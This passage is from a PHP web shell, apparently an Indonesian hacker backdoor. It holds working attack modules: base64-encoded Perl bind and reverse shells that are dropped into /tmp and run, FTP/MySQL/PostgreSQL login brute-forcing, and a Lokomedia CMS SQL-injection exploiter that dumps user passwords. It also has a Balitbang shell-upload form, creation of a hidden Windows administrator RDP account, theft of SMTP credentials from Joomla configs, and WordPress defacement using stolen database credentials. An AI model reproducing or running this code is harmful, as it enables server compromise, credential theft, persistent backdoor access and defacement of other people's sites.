  2967.                             echo "[<font color=yellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  2968.                         }
  2969.                     }
  2970.                 }
  2971.            
  2972.             }else{
  2973.                 tampilkan($shc);
  2974.             }
  2975.         }
  2976.     }
  2977. }
  2978. tampilkan($_POST['shc_dir']);
  2979. }
  2980. echo "</pre>\n";
  2981. echo "</Center>\n";}
  2982. elseif($_GET['666'] == 'network') {
  2983.     echo "<div class='mybox' style='text-align:left;'><form method='post'>
  2984.     <Font size='6pt'>Bind Port:</font><br><hr color='white'>
  2985.     &nbspPORT &nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='port' name='port_bind' value='666'>
  2986.     <br><br><input type='submit' style='width: 50px; height: 30px; border-color=white;' class='kotak' name='sub_bp' value='Go!'>
  2987.     </form></div>
  2988.     <div class='mybox' style='text-align:left;'><form method='post'>
  2989.     <Font size='6pt'>Back Connect:</font> <br><hr color='white'>
  2990.     Server &nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br><br>
  2991.     PORT &nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='port' name='port_bc' value='666'><br><br>
  2992.     <input type='submit' class='kotak' style='width: 50px; height: 30px; border-color=white;' name='sub_bc' value='Go!'>
  2993.     </form></div>
  2994.     <div class='mybox' style='text-align:left;'><form method='POST'>
  2995.     <Font size='6pt'>Metasploit Connection:</font> <br><hr color='white'>Your IP
  2996.     &nbsp<input placeholder='port' style='border:0;border-bottom:1px solid #292929; width:500px;' type='text' size='40' name='yip' value='".$my_ip."' /><br><br>
  2997.     Port&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' size='5' name='yport' value='666' />
  2998.     <br><br><input class='kotak' type='submit' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' value='Go!' name='metaConnect'></form></div>";
  2999.    
  3000. ;
  3001.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3002.     if(isset($_POST['sub_bp'])) {
  3003.         $f_bp = fopen("/tmp/bp.pl", "w");
  3004.         fwrite($f_bp, base64_decode($bind_port_p));
  3005.         fclose($f_bp);
  3006.  
  3007.         $port = $_POST['port_bind'];
  3008.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3009.         sleep(1);
  3010.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3011.         unlink("/tmp/bp.pl");
  3012.     }
  3013.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3014.     if(isset($_POST['sub_bc'])) {
  3015.         $f_bc = fopen("/tmp/bc.pl", "w");
  3016.         fwrite($f_bc, base64_decode($bind_connect_p));
  3017.         fclose($f_bc);
  3018.  
  3019.         $ipbc = $_POST['ip_bc'];
  3020.         $port = $_POST['port_bc'];
  3021.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3022.         sleep(1);
  3023.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3024.         unlink("/tmp/bc.pl");
  3025.     }
  3026. }
  3027. elseif($_GET['666'] == 'brute') {
  3028. if( isset($_POST['proto']) ) {
  3029.         echo '<div class="mybox"><h1>Results</h1><hr color="white"><br><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'</div><br>';
  3030.         if( $_POST['proto'] == 'ftp' ) {
  3031.             function bruteForce($ip,$port,$login,$pass) {
  3032.                 $fp = @ftp_connect($ip, $port?$port:21);
  3033.                 if(!$fp) return false;
  3034.                 $res = @ftp_login($fp, $login, $pass);
  3035.                 @ftp_close($fp);
  3036.                 return $res;
  3037.             }
  3038.         } elseif( $_POST['proto'] == 'mysql' ) {
  3039.             function bruteForce($ip,$port,$login,$pass) {
  3040.                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  3041.                 @mysql_close($res);
  3042.                 return $res;
  3043.             }
  3044.         } elseif( $_POST['proto'] == 'pgsql' ) {
  3045.             function bruteForce($ip,$port,$login,$pass) {
  3046.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  3047.                 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  3048.                 @pg_close($res);
  3049.                 return $res;
  3050.             }
  3051.         }
  3052.         $success = 0;
  3053.         $attempts = 0;
  3054.         $server = explode(":", $_POST['server']);
  3055.         if($_POST['type'] == 1) {
  3056.             $temp = @file('/etc/passwd');
  3057.             if( is_array($temp) )
  3058.                 foreach($temp as $line) {
  3059.                     $line = explode(":", $line);
  3060.                     ++$attempts;
  3061.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  3062.                         $success++;
  3063.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  3064.                     }
  3065.                     if(@$_POST['reverse']) {
  3066.                         $tmp = "";
  3067.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  3068.                             $tmp .= $line[0][$i];
  3069.                         ++$attempts;
  3070.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  3071.                             $success++;
  3072.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  3073.                         }
  3074.                     }
  3075.                 }
  3076.         } elseif($_POST['type'] == 2) {
  3077.             $temp = @file($_POST['dict']);
  3078.             if( is_array($temp) )
  3079.                 foreach($temp as $line) {
  3080.                     $line = trim($line);
  3081.                     ++$attempts;
  3082.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  3083.                         $success++;
  3084.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  3085.                     }
  3086.                 }
  3087.         }
  3088.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  3089.     }
  3090.     echo '<div class="mybox"><h1>FTP bruteforce</h1><hr color="white"><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  3091.         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  3092.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  3093.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  3094.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  3095.         .'<span>Server:port</span></td>'
  3096.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  3097.         .'<tr><td><span>Brute type</span></td>'
  3098.         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  3099.         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  3100.         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  3101.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  3102.         .'<td><input type=text style="border-color=white;" name=login value="berandal"></td></tr>'
  3103.         .'<tr><td><span>Dictionary</span></td>'
  3104.         .'<td><input type=text style="border-color=white;" name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  3105.         .'</td></tr><tr><td></td><td><input class="kotak" type=submit value=">>"></td></tr></form></table>';
  3106.     echo '</div></div>';}
  3107.     elseif($_GET['666'] == 'lokmed')
  3108.     {
  3109. ?>
  3110. <center class='mybox'><h1>CMS Lokomedia Auto Exploiter</h1>
  3111. <form method='post'>
  3112. <textarea name='sites' style='border-color=white;' value='contoh:http://127.0.0.1/hal-tentang-kami.html' cols='50' rows='12'></textarea><br><br>
  3113. <input type='submit' name='go' value='SIKAT!' style='border-color=white;' class='kotak'>
  3114. </FORM></center>
  3115. <?php
  3116. error_reporting(0);
  3117. set_time_limit(0);
  3118. $ya=$_POST['go'];
  3119. $co=$_POST['sites'];
  3120.  
  3121. if($ya){
  3122. $e=explode("rn",$co);
  3123. foreach($e as $bda){    
  3124. $fp = fopen("cookie.txt", "w+");
  3125. $Cookie = realpath('cookie.txt');
  3126. $web = $bda."/statis--1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html";
  3127. $curl=curl_init();
  3128. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  3129. curl_setopt($curl,CURLOPT_URL,"$web");
  3130. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  3131. curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, false);
  3132. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  3133. curl_setopt($curl,CURLOPT_COOKIEFILE, "$Cookie");
  3134. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  3135. $gweb = curl_exec($curl);
  3136. $web2 = $bda."/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html";
  3137. $curl2=curl_init();
  3138. curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);
  3139. curl_setopt($curl2,CURLOPT_URL,"$web2");
  3140. curl_setopt($curl2,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  3141. curl_setopt($curl2,CURLOPT_SSL_VERIFYPEER, false);
  3142. curl_setopt($curl2,CURLOPT_FOLLOWLOCATION,1);
  3143. curl_setopt($curl2,CURLOPT_COOKIEFILE, "$C2ookie");
  3144. curl_setopt($curl2,CURLOPT_TIMEOUT,5);
  3145. $gweb2 = curl_exec($curl2);
  3146. echo '<center><font face="courier" color="#00BFFF" >'.$bda.'</font><br><textarea rows="10" cols="40">'.htmlentities($gweb2).'</textarea>','<textarea rows="10" cols="40">'.htmlentities($gweb).'</textarea>';
  3147. $cek_admin = @file_get_contents("$bda/adminweb");
  3148. if(preg_match("/Copyright/", $cek_admin)) {
  3149.                 echo "<BR><font color=green>Berandal</font> => <font color=white><a href='$bda/adminweb' target='_blank'>$bda/adminweb</a></font><br>";
  3150.                 } else {
  3151.                 echo "<br><br>[-] <font color=red> Gak Ada /adminweb, Jancok! -_-</font>[-]<br><br><hr color='white'>";
  3152. }}}}
  3153.  
  3154.  
  3155. elseif($_GET['666'] == 'balitbang') {
  3156. ?>
  3157. <div class='mybox'><h1>CMS Balitbang Auto Exploiter</h1>
  3158. <form action='' method='post'>
  3159. <center>
  3160. <p>Target URL : <input style='border-color=white;' type='text' name='url' class='text' placeholder='http://127.0.0.1/' size="50"></p>
  3161. </td></p>
  3162. <p><input type='submit' name='send' class='kotak' style='border-color=white;' value='Kunci Target'></p></center>
  3163. </form>
  3164. <?php
  3165. if (isset($_POST['send'])) {
  3166.     $url = $_POST['url'];
  3167.     $resulturl = "Target URL : $url";
  3168.     echo "<center>
  3169. <hr color='white'><br>
  3170. $resulturl
  3171. $resultoken
  3172. </center>";
  3173. echo '<center style="border-color=white;"><form enctype="multipart/form-data" action="'.$url.'/files/tugas/tgs-ganteng.phtml" method="post"></center>';
  3174. echo '<center style="border-color=white;"><input name="file" type="file"><input type="submit" class="kotak" value="Upload"><br><br>Format file: shell.phtml ato shell.php5</center>';
  3175. }
  3176. echo "</div>";
  3177. }
  3178. elseif($_GET['666'] == 'hashid') {
  3179. if (isset($_POST['gethash'])) {
  3180.         $hash = $_POST['hash'];
  3181.         if (strlen($hash) == 32) {
  3182.             $hashresult = "MD5 Hash";
  3183.         } elseif (strlen($hash) == 40) {
  3184.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3185.         } elseif (strlen($hash) == 13) {
  3186.             $hashresult = "DES(Unix) Hash";
  3187.         } elseif (strlen($hash) == 16) {
  3188.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3189.         } elseif (strlen($hash) == 41) {
  3190.             $GetHashChar = substr($hash, 40);
  3191.             if ($GetHashChar == "*") {
  3192.                 $hashresult = "MySQL5 Hash";
  3193.             }
  3194.         } elseif (strlen($hash) == 64) {
  3195.             $hashresult = "SHA-256 Hash";
  3196.         } elseif (strlen($hash) == 96) {
  3197.             $hashresult = "SHA-384 Hash";
  3198.         } elseif (strlen($hash) == 128) {
  3199.             $hashresult = "SHA-512 Hash";
  3200.         } elseif (strlen($hash) == 34) {
  3201.             if (strstr($hash, '$1$')) {
  3202.                 $hashresult = "MD5(Unix) Hash";
  3203.             }
  3204.         } elseif (strlen($hash) == 37) {
  3205.             if (strstr($hash, '$apr1$')) {
  3206.                 $hashresult = "MD5(APR) Hash";
  3207.             }
  3208.         } elseif (strlen($hash) == 34) {
  3209.             if (strstr($hash, '$H$')) {
  3210.                 $hashresult = "MD5(phpBB3) Hash";
  3211.             }
  3212.         } elseif (strlen($hash) == 34) {
  3213.             if (strstr($hash, '$P$')) {
  3214.                 $hashresult = "MD5(Wordpress) Hash";
  3215.             }
  3216.         } elseif (strlen($hash) == 39) {
  3217.             if (strstr($hash, '$5$')) {
  3218.                 $hashresult = "SHA-256(Unix) Hash";
  3219.             }
  3220.         } elseif (strlen($hash) == 39) {
  3221.             if (strstr($hash, '$6$')) {
  3222.                 $hashresult = "SHA-512(Unix) Hash";
  3223.             }
  3224.         } elseif (strlen($hash) == 24) {
  3225.             if (strstr($hash, '==')) {
  3226.                 $hashresult = "MD5(Base-64) Hash";
  3227.             }
  3228.         } else {
  3229.             $hashresult = "Hash type not found";
  3230.         }
  3231.     } else {
  3232.         $hashresult = "Not Hash Entered";
  3233.     }
  3234. ?>
  3235.     <div class='mybox' style="text-align:left">
  3236.         <form action="" method="POST">
  3237.         <tr>
  3238.         <table >
  3239.         <h1>Hash Identifier</h1>
  3240.         <tr class="optionstr"><B><td>String</td></b><td>:</td>  
  3241.         <td><input style='border:0;border-bottom:1px solid #292929; width:500px;' type="text" name="hash" size='60'/></td>
  3242.         <td><input type="submit" class="kotak" name="gethash" value="Identify Hash" /></td></tr>
  3243.         <tr class="optionstr"><b><td>Hasil</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  3244.     </table></tr></form><br>
  3245.     </div>
  3246. <?php
  3247. }
  3248. elseif($_GET['666'] == 'krdp') {
  3249.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  3250.         if($_POST['create']) {
  3251.             $user = htmlspecialchars($_POST['user']);
  3252.             $pass = htmlspecialchars($_POST['pass']);
  3253.             if(preg_match("/$user/", exe("net user"))) {
  3254.                 echo "<div class='mybox'>[INFO] -> <font color=red>user <font color=white>$user</font> sudah ada</font></div>";
  3255.             } else {
  3256.                 $add_user   = exe("net user $user $pass /add");
  3257.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  3258.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  3259.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  3260.                 echo "<div class='mybox'>[ RDP ACCOUNT INFO ]<br>
  3261.                 ------------------------------<br>
  3262.                 IP: <font color=white>".$ip."</font><br>
  3263.                 Username: <font color=white>$user</font><br>
  3264.                 Password: <font color=white>$pass</font><br>
  3265.                 ------------------------------<br><br>
  3266.                 [ STATUS ]<br>
  3267.                 ------------------------------<br>
  3268.  
  3269.                 ";
  3270.                 if($add_user) {
  3271.                     echo "[add user] -> <font color='white'>Berhasil</font><br>";
  3272.                 } else {
  3273.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  3274.                 }
  3275.                 if($add_groups1) {
  3276.                     echo "[add localgroup Administrators] -> <font color='white'>Berhasil</font><br>";
  3277.                 } elseif($add_groups2) {
  3278.                     echo "[add localgroup Administrator] -> <font color='white'>Berhasil</font><br>";
  3279.                 } elseif($add_groups3) {
  3280.                     echo "[add localgroup Administrateur] -> <font color='white'>Berhasil</font><br>";
  3281.                 } else {
  3282.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  3283.                 }
  3284.                 echo "------------------------------<br></div>";
  3285.             }
  3286.         } elseif($_POST['s_opsi']) {
  3287.             $user = htmlspecialchars($_POST['r_user']);
  3288.             if($_POST['opsi'] == '1') {
  3289.                 $cek = exe("net user $user");
  3290.                 echo "<div class='mybox'>Checking username <font color=white>$user</font> ....... ";
  3291.                 if(preg_match("/$user/", $cek)) {
  3292.                     echo "[ <font color=white>Sudah ada</font> ]<br>
  3293.                     ------------------------------<br><br>
  3294.                     <pre>$cek</pre>";
  3295.                 } else {
  3296.                     echo "[ <font color=red>belum ada</font> ]</div>";
  3297.                 }
  3298.             } elseif($_POST['opsi'] == '2') {
  3299.                 $cek = exe("net user $user berandal");
  3300.                 if(preg_match("/$user/", exe("net user"))) {
  3301.                     echo "[change password: <font color=white>berandal</font>] -> ";
  3302.                     if($cek) {
  3303.                         echo "<font color=white>Berhasil</font>";
  3304.                     } else {
  3305.                         echo "<font color=red>Gagal</font>";
  3306.                     }
  3307.                 } else {
  3308.                     echo "<div class='mybox'>[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font></div>";
  3309.                 }
  3310.             } elseif($_POST['opsi'] == '3') {
  3311.                 $cek = exe("net user $user /DELETE");
  3312.                 if(preg_match("/$user/", exe("net user"))) {
  3313.                     echo "[remove user: <font color=white>$user</font>] -> ";
  3314.                     if($cek) {
  3315.                         echo "<font color=white>Berhasil</font>";
  3316.                     } else {
  3317.                         echo "<font color=red>Gagal</font>";
  3318.                     }
  3319.                 } else {
  3320.                     echo "<div class='mybox'>[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font></div>";
  3321.                 }
  3322.             } else {
  3323.                 //
  3324.             }
  3325.         } else {
  3326.             echo "<div class='mybox'>
  3327.             <h1>K-RDP Shell</h1><br>
  3328.             -- Create RDP --
  3329.             <form method='post'>
  3330.             <input type='text' style='border-color=white;' name='user' placeholder='username' value='berandal' required>
  3331.             <input type='text' style='border-color=white;' name='pass' placeholder='password' value='berandal' required>
  3332.             <input type='submit' style='border-color=white;' class='kotak' name='create' value='>>'>
  3333.             </form>
  3334.             -- Option --
  3335.             <form method='post'>
  3336.             <input type='text' style='border-color=white;' name='r_user' placeholder='username' required>
  3337.             <select name='opsi' style='border-color=white;'>
  3338.             <option value='1'>Cek Username</option>
  3339.             <option value='2'>Ubah Password</option>
  3340.             <option value='3'>Hapus Username</option>
  3341.             </select>
  3342.             <input type='submit' style='border-color=white;' class='kotak' name='s_opsi' value='>>'>
  3343.             </form></div>
  3344.             ";
  3345.         }
  3346.     } else {
  3347.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.";
  3348.     }
  3349. }
  3350. elseif($_GET['666'] == 'smtp') {
  3351.     echo "<center class='mybox'><h1>SMTP Grabber</h1><hr color='white'><br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span><br><br>";
  3352.     function scj($dir) {
  3353.         $dira = scandir($dir);
  3354.         foreach($dira as $dirb) {
  3355.             if(!is_file("$dir/$dirb")) continue;
  3356.             $ambil = file_get_contents("$dir/$dirb");
  3357.             $ambil = str_replace("$", "", $ambil);
  3358.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3359.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3360.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3361.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3362.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3363.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3364.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3365.                 echo "SMTP Host: <font color=white>$smtp_host</font><br>";
  3366.                 echo "SMTP port: <font color=white>$smtp_port</font><br>";
  3367.                 echo "SMTP user: <font color=white>$smtp_user</font><br>";
  3368.                 echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
  3369.                 echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
  3370.                 echo "SMTP secure: <font color=white>$smtp_secure</font><br><br></center>";
  3371.             }
  3372.         }
  3373.     }
  3374.     $smpt_hunter = scj($dir);
  3375.     echo $smpt_hunter;
  3376. } elseif($_GET['666'] == 'auto_wp') {
  3377.     if($_POST['sikat']) {
  3378.         $title = htmlspecialchars($_POST['new_title']);
  3379.         $pn_title = str_replace(" ", "-", $title);
  3380.         if($_POST['cek_edit'] == "Y") {
  3381.             $script = $_POST['edit_content'];
  3382.         } else {
  3383.             $script = $title;
  3384.         }
  3385.         $conf = $_POST['config_dir'];
  3386.         $scan_conf = scandir($conf);
  3387.         foreach($scan_conf as $file_conf) {
  3388.             if(!is_file("$conf/$file_conf")) continue;
  3389.             $config = file_get_contents("$conf/$file_conf");
  3390.             if(preg_match("/WordPress/", $config)) {
  3391.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3392.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3393.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3394.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3395.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3396.                 $prefix = $dbprefix."posts";
  3397.                 $option = $dbprefix."options";
  3398.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3399.                 $db = mysql_select_db($dbname);
  3400.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3401.                 $result = mysql_fetch_array($q);
  3402.                 $id = $result[ID];
  3403.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3404.                 $result2 = mysql_fetch_array($q2);
  3405.                 $target = $result2[option_value];
  3406.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3407.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3408.                 echo "<div style='margin: 5px auto;'>";
  3409.                 if($target == '') {
  3410.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya cok !!</font> -> ";
  3411.                 } else {
  3412.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3413.                 }
  3414.                 if(!$update OR !$conn OR !$db) {
  3415.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3416.                 } else {
  3417.                     echo "<font color=white>Sukses di ganti, CoK!</font><br>";
  3418.                 }
  3419.                 echo "</div>";
  3420.                 mysql_close($conn);
  3421.             }
  3422.         }
  3423.     } else {
  3424.         echo "<div style='text-align:left' class='mybox'>
  3425.         <h1>Auto Edit Title+Content WordPress</h1><hr color='white'>
  3426.         <form method='post'>
  3427.         DIR Config:
  3428.         <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' name='config_dir' value='$dir'><br><br>
  3429.         Set Title:
  3430.         &nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='new_title' value='CYBERSCRYTECH_ IN HERE ^_^' size='40' placeholder='New Title'><br><br>
  3431.         Edit Content?: <input type='radio' style='border-color=white'name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3432.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3433.         <textarea style='border-color:#292929' name='edit_content' class='mybox' placeholder='contoh script: http://pastebin.com/u/Berandal666' style='width: 450px; height: 150px;'></textarea><br>
  3434.         <input type='submit' name='SIKAT!' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' value='SIKAT!' style='width: 450px;'><br>
  3435.         </form>
  3436.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span></div><br>
  3437.         ";
  3438.     }
  3439. }
  3440. elseif($_GET['666'] == 'fake_root') {
  3441.     ob_start();
  3442.     function reverse($url) {
  3443.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3444.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3445.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3446.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3447.               curl_setopt($ch, CURLOPT_POST, 1);
  3448.         $resp = curl_exec($ch);
  3449.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3450.         $array = explode(",,", $resp);
  3451.         unset($array[0]);
  3452.         foreach($array as $lnk) {
  3453.             $lnk = "http://$lnk";
  3454.             $lnk = str_replace(",", "", $lnk);
  3455.             echo $lnk."\n";
  3456.             ob_flush();
  3457.             flush();
  3458.         }
  3459.               curl_close($ch);
  3460.     }
  3461.     function cek($url) {
  3462.         $ch = curl_init($url);
  3463.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3464.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3465.         $resp = curl_exec($ch);
  3466.         return $resp;
  3467.     }
  3468.     $cwd = getcwd();
  3469.     $ambil_user = explode("/", $cwd);
  3470.     $user = $ambil_user[2];
  3471.     if($_POST['reverse']) {
  3472.         $site = explode("\r\n", $_POST['url']);
  3473.         $file = $_POST['file'];
  3474.         foreach($site as $url) {
  3475.             $cek = cek("$url/~$user/$file");
  3476.             if(preg_match("/hacked/i", $cek)) {
  3477.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
  3478.             }
  3479.         }
  3480.     } else {
  3481.         echo "<div style='text-align:left' class='mybox'><form method='post'>
  3482.         <h1>Fake Root Scanner</h1><hr color='white'>
  3483.         Filename: <input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' style='border-color=white' name='file' placeholder='os.html' size='50' height='10'><br><br>
  3484.         User: &nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' value='$user' size='50' style='border-color=white' height='10' readonly><br><br>
  3485.         Domen:<br>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
  3486.         <textarea style='border-color:#292929; class='mybox' height: 250px;' name='url'>";
  3487.         reverse($_SERVER['HTTP_HOST']);
  3488.         echo "</textarea><br>
  3489.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='submit' style='width: 130px; height: 30px; border-color=white;margin:10px 2px 0 2px;' name='reverse' value='Scan Fake Root!' class='kotak' style='width: 450px; border-color=white;'>
  3490.         </form><br>
  3491.         &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbspNB: Sebelum pake Tools ini , upload dulu script depes di dir /home/user/ dan /home/user/public_html.</div>";
  3492.     }
